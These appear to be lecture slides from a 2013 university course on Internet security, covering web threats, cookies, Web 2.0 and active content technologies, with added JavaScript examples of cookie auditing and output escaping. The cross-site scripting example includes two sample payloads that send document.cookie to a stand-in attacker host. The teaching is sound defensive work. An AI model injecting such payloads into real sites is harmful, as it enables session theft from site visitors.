CSCD 303
Essential Computer
Security
Spring 2013
Lecture 11 – Internet Security
Reading: See links end of Lecture
Overview
• Internet Security
• Threats
• Web Technology
• Web 2.0
• Active Content
– Javascript
– Java Applets
– ActiveX Controls
– VBScript
– Ajax
Internet Security
The major source of security problems today is the Internet
Going to study how the Internet works and the
technologies that make the Internet both popular
and unsafe at the same time
The way the Web has evolved from serving static content to
hosting user-created content has contributed to the difficulty of
keeping safe while we surf
Web Threats
Internet Threats 2009
• 23,500 new infected Web pages are discovered every day
– One every 3.6 seconds
• 15 new bogus anti-virus vendor websites discovered every
day!!
– Number has tripled, up from average of five detected per day,
during 2008
• 6,500 new spam-related websites are discovered every day
– One website every 13 seconds, 24 hours a day
– Almost double same period in 2008
http://www.sophos.com/sophos/.../sophos-security-threat-report-jul2009-na-wpus.pdf
More Internet Stats
http://community.websense.com/blogs/websensefeatures/archive/2009/09/15/websense-security-labs-report-stateof-internet-security-q1-q2-2009.aspx
• Today's threats are Web Based
– During first half of 2009 Websense Security Labs
discovered:
• 233% growth in number of malicious sites in last six
months and a 671% growth during last year
• 77% of Web sites with malicious code are legitimate sites
that have been compromised.
• 86% of all unwanted emails in circulation contained links
to spam sites and/or malicious Web sites
More Security Threats 2013
http://blog.spikes.com/blog/2013/1/11/the-top-security-threat-of2013-is-the-web-browser
Recognition among security authorities that drive-by malware
from web links is #1 threat facing networks today
Attackers are moving into targeting browser plugins such as
Java, Adobe Reader and Adobe Flash.
Drive-by download attacks are almost exclusively launched
through compromised legitimate websites which are used by
attackers to host malicious links and actual malicious code
Web Technology
• Useful to understand how Web works
– As technical people, have basic understanding of
clients/servers
– Look at details and some stats on both browsers and
Web Servers
– Which browsers would you guess are most popular
today?
Nice page of ALL Web browsers, even text based
http://www.webdevelopersnotes.com/design/browsers_list.php3
Web Browser Stats
• Monthly statistics on Web Browser market
http://www.w3schools.com/browsers/browsers_stats.asp
Ranking as of December 2012
1st - Chrome
2nd - Firefox
3rd – Internet Explorer
There are five major browsers used today
Internet Explorer, Firefox, Safari, Chrome and Opera
Web Server Stats
http://royal.pingdom.com/2011/09/16/microsoft-iis-web-server-marketshare-loss/
• Based on a survey of 205+ million sites, Netcraft reports that
Apache has a 65% share in 2011 while IIS has 16%
Web Browser Functions
• Browser interprets and displays HTML files
– Supposed to conform to specifications maintained by
the W3C (World Wide Web Consortium)
• Standards organization for the Web
– Current Version HTML 4.01, Version 5 in progress
http://www.w3.org/TR/html401/
– Current CSS Version 2, Version 3 in progress
http://www.w3.org/TR/CSS2/
Plug-ins Enhance Browsers
• Visit web page that includes more than simple HTML
content
– Likely to need plug-in applications
• Flash Player most needed plug-in
– 75% of the animated advertisements you see online are
Flash .swf movies
• Adobe Acrobat Reader .pdf, next most needed
– Most government forms, online application forms,
multitude of other documents use .pdf format on the Web
• Movie/audio player to run .mov, .mp3, .wav, .au, and
.avi files
– Windows Media Player is the most popular
Browser and Web Server State
• HTTP, the protocol between browsers and Web
servers, does not keep “state”
– What does this mean?
• How can browsers and Web Servers keep
state?
Browsers and Web Server State
Defined
This means that, on its own, HTTP carries no user data from
one Web page to the next within a Web site; every request
is handled independently of the ones before it
Web developers refer to the practice of tracking users across
requests as maintaining state
The series of interactions that a particular user has with
a site is a session
Browser State
• How do browsers keep state?
– Cookies!!!
• Cookies, small text files stored in your computer's browser
directory or other directory
• Cookies
– Created when you use your browser to visit a website that
uses cookies to keep track of your movements within the
site,
– Helps resume where you left off,
– Remembers registered login, theme selection, preferences,
and other customization functions
Browser Cookies
• Two types of cookies are used
• Session cookies,
– Temporary cookies with no expiration date
– Kept only in the browser's memory, never written to the
cookie file; discarded when the browser is closed
• Persistent cookies,
– Written to the cookie file and kept for much longer
– Have an expiration date set by the site
Browser Cookies
http://en.wikipedia.org/wiki/HTTP_cookie
Each cookie has values for six fields:
* Name - Name of the cookie
* Value - ID string (or other data) set by the Web site
* Domain - Domain of the Web site issuing the cookie; when set
explicitly, the cookie is also sent to every subdomain
* Path - “/” means the cookie is valid anywhere on that domain
* Expires - Date the cookie expires; no Expires means a session cookie
* Secure - Browser sends the cookie only over an SSL/TLS (https)
connection, never over plain http
Browsers also honor a seventh attribute, HttpOnly, which keeps
page scripts (document.cookie) from reading the cookie
Example from my cookie stash ....
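Added example, not code from the lecture: a small parser that turns a Set-Cookie header into the fields listed above (plus HttpOnly) and reports what a security reviewer looks at first. The function names are mine and the sample headers at the bottom are constructed for this illustration, not captured from a real site.

```javascript
// Parse one Set-Cookie header value into the cookie fields from the slide.
// `now` is only needed to resolve Max-Age, which is relative to the current time.
function parseSetCookie(header, now = new Date()) {
  const parts = header.split(';').map((p) => p.trim()).filter((p) => p.length > 0);
  if (parts.length === 0) return null;
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: eq < 0 ? parts[0] : parts[0].slice(0, eq),
    value: eq < 0 ? '' : parts[0].slice(eq + 1),
    domain: null,      // null: host-only, sent back to the issuing host only
    path: '/',         // "/": valid anywhere on that domain
    expires: null,     // null: session cookie, kept in memory until the browser exits
    secure: false,     // true: sent only over https
    httpOnly: false,   // true: hidden from document.cookie
  };
  let maxAgeSeen = false;
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i < 0 ? attr : attr.slice(0, i)).trim().toLowerCase();
    const val = i < 0 ? '' : attr.slice(i + 1).trim();
    if (key === 'domain') {
      cookie.domain = val.replace(/^\./, '').toLowerCase();
    } else if (key === 'path') {
      cookie.path = val || '/';
    } else if (key === 'expires') {
      const d = new Date(val);
      // Max-Age wins over Expires when both are present
      if (!maxAgeSeen && !Number.isNaN(d.getTime())) cookie.expires = d;
    } else if (key === 'max-age') {
      const secs = parseInt(val, 10);
      if (!Number.isNaN(secs)) {
        maxAgeSeen = true;
        cookie.expires = new Date(now.getTime() + secs * 1000);
      }
    } else if (key === 'secure') {
      cookie.secure = true;
    } else if (key === 'httponly') {
      cookie.httpOnly = true;
    }
  }
  return cookie;
}

// Turn the parsed fields into the observations a reviewer would write down.
function auditCookie(cookie, now = new Date()) {
  const findings = [];
  if (cookie.expires === null) {
    findings.push('session cookie: kept in memory, dropped when the browser closes');
  } else if (cookie.expires <= now) {
    findings.push('expired: the browser deletes it immediately');
  } else {
    findings.push('persistent cookie: written to disk until ' + cookie.expires.toUTCString());
  }
  if (!cookie.secure) findings.push('no Secure flag: also sent over plain http, visible on the wire');
  if (!cookie.httpOnly) findings.push('no HttpOnly flag: readable by any script on the page');
  if (cookie.domain !== null) findings.push('Domain set: shared with every subdomain of ' + cookie.domain);
  if (cookie.path === '/') findings.push('Path /: sent with every request to the site');
  return findings;
}

// Constructed sample headers (not from a real server)
const SAMPLE_HEADERS = [
  'SESSIONID=5f2c9a1e; Path=/; Secure; HttpOnly',
  'prefs=theme%3Ddark; Domain=.example.com; Path=/; Expires=Wed, 21 Oct 2015 07:28:00 GMT',
  'tracker=abc; Max-Age=2592000; Path=/',
];

for (const h of SAMPLE_HEADERS) {
  const c = parseSetCookie(h);
  console.log(c.name + ':', auditCookie(c).join(' | '));
}
```

The first header is what a login cookie should look like: no expiry, Secure and HttpOnly both set. The second shows why a Domain attribute matters, since every subdomain of example.com will receive it, and the third shows a Max-Age cookie, which the audit reports as persistent.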
Evolution of Web Technologies
Problem
• All research shows, Internet based attacks
appear to be increasing
– Why is this?
Evolved from Web 1.0 to 2.0
Most people agree that Web 2.0 is
– Interactive and social
– Facilitating collaboration between people
This is distinct from the early web (Web 1.0) which was a
static information dump where people read websites but
rarely interacted with them.
Web 2.0
• How do you define Web 2.0?
– Web "as Platform," where software applications
built on Web as opposed to desktop
– Customers are building content
• Activities of users generating content ...
ideas, text, videos, pictures create value to
web site ...
• Nice YouTube Video of “Us as Web”
http://www.youtube.com/watch?v=NLlGopyXT_g
Web 2.0 vs. Web 1.0
Web 2.0 Technologies
Web 2.0
• Web 1.0
– Pull information
– Read information
– HTML (Web pages)
• Web 2.0
– Push information
– Read / write (cooperate and collaborate)
– XML, RSS, Mash-ups
– What's a mash-up?
Mash-up Defined
• A mashup
– Web site that combines content data from more
than one source to create a new user experience.
– "mashup" comes from pop music term, refers to
two or more songs combined into a new song
• Example
– Most common Google product used for mashups is
Google Maps
Security and Web 2.0
• Why is Web 2.0 Insecure?
– User generated content
• Do you trust your users?
• Anyone can upload content, so it is easier to plant
malicious scripts or links where other users will load them
– More complicated technologies behind Web 2.0
• Active content – scripts and other automatic
components
• Combined content from many sources
– Third-party advertising often contributes vulnerabilities
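Added example, not code from the lecture: the user-generated-content problem in its smallest form. A site that splices a visitor's comment straight into its page markup turns that comment into active content for every other visitor (stored cross-site scripting). The comment strings are constructed sample input, and the function names and markup layout are assumptions made for this illustration.

```javascript
// Untrusted input, as an attacker would submit it through the site's own comment form
const SAMPLE_COMMENTS = [
  'Nice post!',
  '<script>new Image().src="http://evil.example/c?"+document.cookie</script>',
  'look <img src=x onerror="document.location=\'http://evil.example/\'+document.cookie">',
];

// Vulnerable: the user's text becomes part of the page, so any tag in it
// executes in the browser of every visitor who views the comment
function renderCommentUnsafe(text) {
  return '<div class="comment">' + text + '</div>';
}

// Escape the five characters that can change meaning in HTML text and attribute values
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Safe for this context: the browser displays the tag text instead of executing it
function renderCommentSafe(text) {
  return '<div class="comment">' + escapeHtml(text) + '</div>';
}

// Escaping covers element text. A user-supplied link is a different context:
// it must also be restricted to http(s), or a javascript: URL runs as code
function safeHref(url) {
  let u;
  try {
    u = new URL(String(url));
  } catch (e) {
    return '#';
  }
  return u.protocol === 'http:' || u.protocol === 'https:' ? escapeHtml(u.href) : '#';
}

// Reviewer's check: does the user-controlled part of the rendered markup still hold a tag?
function containsMarkup(renderedComment) {
  const inner = renderedComment.slice('<div class="comment">'.length, -'</div>'.length);
  return /<\/?[a-z!]/i.test(inner);
}

for (const c of SAMPLE_COMMENTS) {
  console.log('unsafe render still contains a tag:', containsMarkup(renderCommentUnsafe(c)));
  console.log('safe render still contains a tag:  ', containsMarkup(renderCommentSafe(c)));
}
```

Escaping has to be done per output context (text, attribute, URL, script); the same string that is harmless after escapeHtml in element text is still dangerous as an href, which is what safeHref handles.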
Web 2.0 Increases Threat
• Popularity of Web 2.0 sites has changed the way we
communicate and use the Web
• Created an irresistible target for malware authors
– Social-networking sites, blogs, and wikis
• Malware authors take advantage of these sites, opening up
yet another front in the cat-and-mouse game between security
defenses and hackers
http://www.scmagazineus.com/How-to-protect-against-Web-20-threats/article/34711/
Web 2.0 Nightmare
• “Every company has plans to move mission
critical applications to the Web
– Yet, companies do not have web security plan
to ensure applications free from exploits and
hackers … (accidents waiting to happen)”
CIO Magazine quote
http://cio20.com/2008/01/03/web-20-and-application-security/
– Look at the technologies that enable the Web to
function
Web 3.0 is Coming
http://socialmediatoday.com/node/423732
Web 3.0 is a Marketing Term. Sadly, this is probably the
most likely way that we'll be using the term 'Web 3.0' in
the future
Within Web 3.0 social networks will be critical conduits
through which we design and stumble through our
individual contexts, veering out to increasingly social
content experiences built by big content providers like
Yahoo, AOL, newspapers, blogs and so on
Amazon and eBay have already become large media
experiences as we come to enjoy the act of browsing
as much as the act of buying
Active Content
• Used to be Web pages consisted of HTML
– Purpose of the Internet was
• Downloading information
• Viewing pictures and other graphic images
• Filling out input forms
• Our Web site, example of what kind of content?
http://penguin.ewu.edu/cscd303/
Active Content
• What is active content?
• Web site that is either interactive
– Such as Internet polls or
– Dynamic, such as animated GIFs, stock tickers,
weather maps, moving ads
– Embedded objects, streaming video and audio
ABC
http://abc.go.com/
Active Content Languages
• Implementing Active Content
– HTML does not have built in capability to
handle active content
• Embedded video objects,
• Dancing bears
– Other languages added to Web pages within
HTML tags allow expanded capability
– What languages implement Active Content?
Active Content Languages
• Active content implemented mainly through
– Javascript
– ActiveX Controls
– Java Applets
– VBScript
– AJAX
Javascript
• What is it? Does it have anything to do with Java?
– JavaScript is unrelated to the Java programming
language
• Has C-like syntax
• JavaScript copies many Java names and
naming conventions
– Was originally named "LiveScript"
• Renamed in a co-marketing deal between
Netscape and Sun
• Netscape bundled Sun's Java runtime in
their then-dominant browser
Javascript
JavaScript writes functions that are embedded in or
included from an HTML page
Simple Examples
– Opening or popping up a new window with control
over the size, position, and attributes of the window
– Validation of web form input values before they are
submitted to the server (a convenience only: the user
controls the browser, so the server must validate again)
– Changing images as the mouse cursor moves over
them … catches the user’s attention
– Example here
http://www.javascripter.net/faq/onmouseo.htm
Javascript
• JavaScript code runs locally in the user's
browser
– Responds to user actions quickly, making an
application feel more responsive
– Example:
• Gmail's user interface is written in JavaScript
– JavaScript dispatches requests for
information such as the content of an e-mail
message
HTML code with Javascript
<html>
<head><title>simple page</title></head>
<body>
<script type="text/javascript">
document.write ('Hello World!');
</script>
<noscript>
<p>Your browser either does not support
JavaScript, or you have JavaScript turned
off.</p>
</noscript>
</body>
</html>
Java Applets
• Java Applets
– The word applet is meant to suggest a small
application
– Applets were intended to be small programs
run over the Internet
• Applets can be viewed over the Internet, or
without any connection to the Internet
• When you use a browser to view a page that
contains an applet, the applet's code is
transferred to your system
• Executed by the browser's Java plug-in, a Java Virtual
Machine (JVM); unsigned applets run inside the JVM's
sandbox, so an applet only gets full access when the user
accepts a signed one or the sandbox itself is broken
Java Applets
• An applet class is compiled in same way
as any other Java class
– However, applets run differently from other
Java programs
• Normal way to run applet is to embed it in
an HTML document
– Then run and viewed through a Web browser
Java Applets
<html>
<head>
<title>
Vampire Control
</title>
</head>
...
<applet code="AppletCalculator.class" width=400 height=300>
</applet>
...
</html>
Active X
• ActiveX, a set of object-oriented programming
technologies and tools from Microsoft!
• In the ActiveX environment you create a component
– A self-contained binary program that any ActiveX-aware
host on Windows can load and run
– Component known as an ActiveX control
– ActiveX was Microsoft's answer to Java
• An ActiveX control is like a Java applet
– Can be developed in several languages
• Visual Basic,
• C++
• Java
Active X
• ActiveX is a 1996 re-branding and extension of Microsoft's
Component Object Model (COM) and OLE technologies
for Windows; OLE controls became ActiveX controls
• A software application can compose one or more
components in order to provide needed functionality
Active X
• Most Microsoft Windows applications
– Internet Explorer, Microsoft Office, Microsoft Visual
Studio, Windows Media Player,
– All … Use ActiveX controls
• Encapsulate functionality as ActiveX controls
can be embedded in other applications
• Internet Explorer also allows ActiveX controls to be
embedded inside web pages
• Point for us,
• Can expand application functionality to the Web!
Example Active X Control
Active X
• ActiveX controls are like Java applets,
• Both designed to be downloaded and executed from
web browsers
• Differences
• Java applets can run on nearly any platform,
• ActiveX components run only on Windows, and in a
browser only in Microsoft's Internet Explorer
• ActiveX controls are native code with no sandbox: they run
with the full privileges of the logged-in user, a much higher
level of control over Windows than Java applets get
• Making them both more powerful and dangerous!!!
Active X Example
• The process of embedding ActiveX controls into a web page is very similar to the way Java
applets are embedded. The following example shows the HTML code used to embed an
ActiveX control.
<OBJECT ID="AreaMenu" WIDTH=192 HEIGHT=192
CLASSID="CLSID:275E2FE0-7486-11D0-89D6-00A0C90C9B67"
CODEBASE="http://activex.microsoft.com/controls/mcsi/mcsimenu.cab#version=1,0,0,44">
<PARAM NAME="ForeColor" VALUE="&H00000000">
<PARAM NAME="BackColor" VALUE="&H00BEBEBE">
<PARAM NAME="FontName" VALUE="Verdana">
<PARAM NAME="FontSize" VALUE="10">
<PARAM NAME="FontBold" VALUE="0">
<PARAM NAME="FontItalic" VALUE="0">
<PARAM NAME="FontUnderline" VALUE="0">
<PARAM NAME="FontStrikethrough" VALUE="0">
<PARAM NAME="FontCharset" VALUE="0">
</OBJECT>
Active X Example
• The OBJECT tag creates the ActiveX object. The tag has 5 attributes:
– ID: Object name. You use ID to refer to the object from
JavaScript
– WIDTH: defines the width of the control on the web page
– HEIGHT: defines the height of the control on the web page
– CLASSID: Each ActiveX control is assigned a unique Class ID
(a GUID), like an identification number, used to tell the
computer which ActiveX control to load
– CODEBASE: If the control is not present on the system, the Codebase
attribute tells the browser where to find the control on the
Internet. The viewer's browser will then download the file and
install it on the user's computer. Because the control is native code,
Internet Explorer gates this download on the security-zone settings
and the Authenticode signature on the .cab file
– Short article below explains ActiveX
http://www.cs.ualberta.ca/~zaiane/courses/cmput499/work/presentations/activex.html
VBScript
• VBScript
– Visual Basic Scripting Edition
– An Active Scripting language developed by
Microsoft
– Language's syntax reflects its history as a
limited variation of Microsoft's Visual Basic
programming language
VBScript
• VBScript is installed by default in every
desktop release of Microsoft Windows
since Windows 98
• In the browser it is supported only by Microsoft
Internet Explorer
• VBScript is similar in function to JavaScript,
as a language to write functions that are
embedded in or included from HTML pages
VBScript
• Web browsers such as Firefox and Opera do not
have built-in support for VBScript
• So ... developers almost always use JavaScript
for cross-browser compatibility
• Besides client-side web development,
• VBScript is used for server-side processing of
web pages, most notably with Microsoft Active
Server Pages (ASP)
VBScript Example
<html>
<body>
<script type="text/vbscript">
document.write("Hello World")
</script>
</body>
</html>
Can you see this in Firefox?
Ajax
• AJAX
– Group of web technologies
– Implements a web application that communicates
with a server in the background,
– Without interfering with the current state of the
page
• AJAX = Asynchronous JavaScript and XML
• AJAX is based on JavaScript and HTTP requests
• Not a new language but a combination of languages
already known
Ajax
Traditional Web application, interaction
between customer and server goes like this
1. Customer accesses Web application
2. Server processes request and sends data to browser
while the customer waits
3. Customer clicks on a link or interacts with the application
4. Server processes request and sends data back to the
browser while customer waits
5. etc....
• There is a lot of customer waiting!!
Ajax
• Ajax Acts as an Intermediary
• Ajax engine works within Web browser to render Web
application and handle any requests that customer might
have of Web server
• At start of session, browser loads an Ajax Engine — written
in JavaScript and usually tucked away in a hidden frame
– Engine is responsible for both rendering interface user
sees and communicating with server on user’s behalf
Ajax vs Traditional Web Browser
Ajax
• With Ajax,
– JavaScript loaded when page loads handles most of
basic tasks
– Data validation and manipulation,
– Plus displays changes ... without a trip to server!!
• Same time that it makes display changes for customer,
sends data back and forth to server
– Data transfer is not dependent upon actions of
customer
– Google Maps,
– Google Suggest,
– Flickr
all use Ajax
• http://adaptivepath.com/ideas/essays/archives/000385.php
Summary
• Begun to look at Internet and Web security
• Web 2.0 is a problem
• Active Content is today’s Internet
• People want functionality
• Security seems to be secondary
• So, what else is new?
References
• Nice Overview of Browser/Web Workings
http://taligarsiel.com/Projects/howbrowserswork1.htm
• Wikipedia Browser Comparison Page
http://en.wikipedia.org/wiki/Comparison_of_web_browsers
• Browser Cookies
http://www.timeatlas.com/term_to_learn/general/browser_cookie_basics
http://www.morevisibility.com/analyticsblog/from-__utma-to-__utmzgoogle-analytics-cookies.html
• Web 2.0
http://en.wikipedia.org/wiki/Web_2
The End
• Next Time more Internet Security